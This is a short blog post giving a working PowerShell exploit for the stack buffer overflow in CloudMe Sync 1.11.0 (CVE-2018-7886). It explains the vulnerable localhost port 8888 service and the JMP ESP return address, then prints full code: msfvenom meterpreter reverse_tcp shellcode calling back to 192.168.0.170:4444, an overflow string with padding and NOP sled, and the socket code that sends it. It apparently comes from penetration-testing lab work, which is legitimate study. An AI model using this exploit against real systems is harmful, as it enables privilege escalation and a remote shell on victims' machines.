.png)
CloudMe Sync 1-11-0 - Local Stack-based Buffer Overflow Powershell
The following post explain how to exploit a stack-based buffer overflow vulnerability in CloudMe Sync v1.11.0 via PowerShell
Vulnerability
The vulnerability lies in the CloudMe Sync client listening on localhost on port 8888.
Attack Vector
An attacker can send a specially crafted payload to the application on port 8888 to execute arbitrary code.
Threat
If the application is running with Adminitrator privileges, it can result in local privilege escalation. By default, the application listens on localhost. However, if the application is configured to listen on a public IP, it can lead to remote code execution. Using this an unauthenticated attacker can gain shell access to the target machine.
Proof-of-Concept
This is a PowerShell port of the exploit (https://bit.ly/3ko8I9H)
# Title: CloudMe Sync 1.11.0 - Local Stack-based Buffer Overflow (Powershell)
# Author: Uday Mittal (https://github.com/yaksas443/YaksasCSC-Lab/)
# Vendor Homepage: https://www.cloudme.com/en/sync
# Software Link: https://github.com/yaksas443/YaksasCSC-Lab/blob/master/PT-Lab/Exploits/CloudMe%20Sync/f0534b12cd51fefd44002862918801ab-CloudMe_1112.exe
# Version v1.11.0
# Tested on: Windows 10
# CVE: CVE-2018-7886 (Prasenjit Kanti Paul)
# EIP Over-written by: 316A4230 at 1052 (msf-pattern_offset -l 15000 -q 316A4230)
# JMP ESP
# Address=699A0159 Message= 0x699a0159 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [Qt5Network.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\ptlabmachine\AppData\Local\Programs\CloudMe\CloudMe\Qt5Network.dll)
#shellcode command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.170 LPORT=4444 -b \x00\x0a -f powershell
$tcpClient = New-Object System.Net.Sockets.TCPClient
$tcpClient.Connect("localhost","8888")
[Byte[]] $buf = 0x33,0xc9,0x83,0xe9,0xaa,0xe8,0xff,0xff,0xff,0xff,0xc0,0x5e,0x81,0x76,0xe,0x55,0xe1,0x9b,0xb5,0x83,0xee,0xfc,0xe2,0xf4,0xa9,0x9,0x19,0xb5,0x55,0xe1,0xfb,0x3c,0xb0,0xd0,0x5b,0xd1,0xde,0xb1,0xab,0x3e,0x7,0xed,0x10,0xe7,0x41,0x6a,0xe9,0x9d,0x5a,0x56,0xd1,0x93,0x64,0x1e,0x37,0x89,0x34,0x9d,0x99,0x99,0x75,0x20,0x54,0xb8,0x54,0x26,0x79,0x47,0x7,0xb6,0x10,0xe7,0x45,0x6a,0xd1,0x89,0xde,0xad,0x8a,0xcd,0xb6,0xa9,0x9a,0x64,0x4,0x6a,0xc2,0x95,0x54,0x32,0x10,0xfc,0x4d,0x2,0xa1,0xfc,0xde,0xd5,0x10,0xb4,0x83,0xd0,0x64,0x19,0x94,0x2e,0x96,0xb4,0x92,0xd9,0x7b,0xc0,0xa3,0xe2,0xe6,0x4d,0x6e,0x9c,0xbf,0xc0,0xb1,0xb9,0x10,0xed,0x71,0xe0,0x48,0xd3,0xde,0xed,0xd0,0x3e,0xd,0xfd,0x9a,0x66,0xde,0xe5,0x10,0xb4,0x85,0x68,0xdf,0x91,0x71,0xba,0xc0,0xd4,0xc,0xbb,0xca,0x4a,0xb5,0xbe,0xc4,0xef,0xde,0xf3,0x70,0x38,0x8,0x89,0xa8,0x87,0x55,0xe1,0xf3,0xc2,0x26,0xd3,0xc4,0xe1,0x3d,0xad,0xec,0x93,0x52,0x68,0x73,0x4a,0x85,0x59,0xb,0xb4,0x55,0xe1,0xb2,0x71,0x1,0xb1,0xf3,0x9c,0xd5,0x8a,0x9b,0x4a,0x80,0x8b,0x91,0xdd,0x95,0x49,0x9b,0x1f,0x3d,0xe3,0x9b,0xa4,0x9,0x68,0x7d,0xe5,0x5,0xb1,0xcb,0xf5,0x5,0xa1,0xcb,0xdd,0xbf,0xee,0x44,0x55,0xaa,0x34,0xc,0xdf,0x45,0xb7,0xcc,0xdd,0xcc,0x44,0xef,0xd4,0xaa,0x34,0x1e,0x75,0x21,0xeb,0x64,0xfb,0x5d,0x94,0x77,0x5d,0x32,0xe1,0x9b,0xb5,0x3f,0xe1,0xf1,0xb1,0x3,0xb6,0xf3,0xb7,0x8c,0x29,0xc4,0x4a,0x80,0x62,0x63,0xb5,0x2b,0xd7,0x10,0x83,0x3f,0xa1,0xf3,0xb5,0x45,0xe1,0x9b,0xe3,0x3f,0xe1,0xf3,0xed,0xf1,0xb2,0x7e,0x4a,0x80,0x72,0xc8,0xdf,0x55,0xb7,0xc8,0xe2,0x3d,0xe3,0x42,0x7d,0xa,0x1e,0x4e,0x36,0xad,0xe1,0xe6,0x9d,0xd,0x89,0x9b,0xf5,0x55,0xe1,0xf1,0xb5,0x5,0x89,0x90,0x9a,0x5a,0xd1,0x64,0x60,0x2,0x89,0xee,0xdb,0x18,0x80,0x64,0x60,0xb,0xbf,0x64,0xb9,0x71,0xee,0x1e,0xc5,0xaa,0x1e,0x64,0x5c,0xce,0x1e,0x64,0x4a,0x54,0x22,0xb2,0x73,0x20,0x20,0x58,0xe,0xa5,0x54,0x39,0xe3,0x3f,0xe1,0xc8,0x4a,0x80,0xe1,0x9b,0xb5
[Byte[]] $evilString = [Byte[]] (0x41) * 0x41c + [Byte[]] (0x59,0x01,0x9A,0x69) + [Byte[]] (0x90) * 100 + $buf
$clientStream = $tcpClient.GetStream()
$clientStream.Write($evilString,0,$evilString.length)
$clientStream.Flush()
Written on August 7, 2020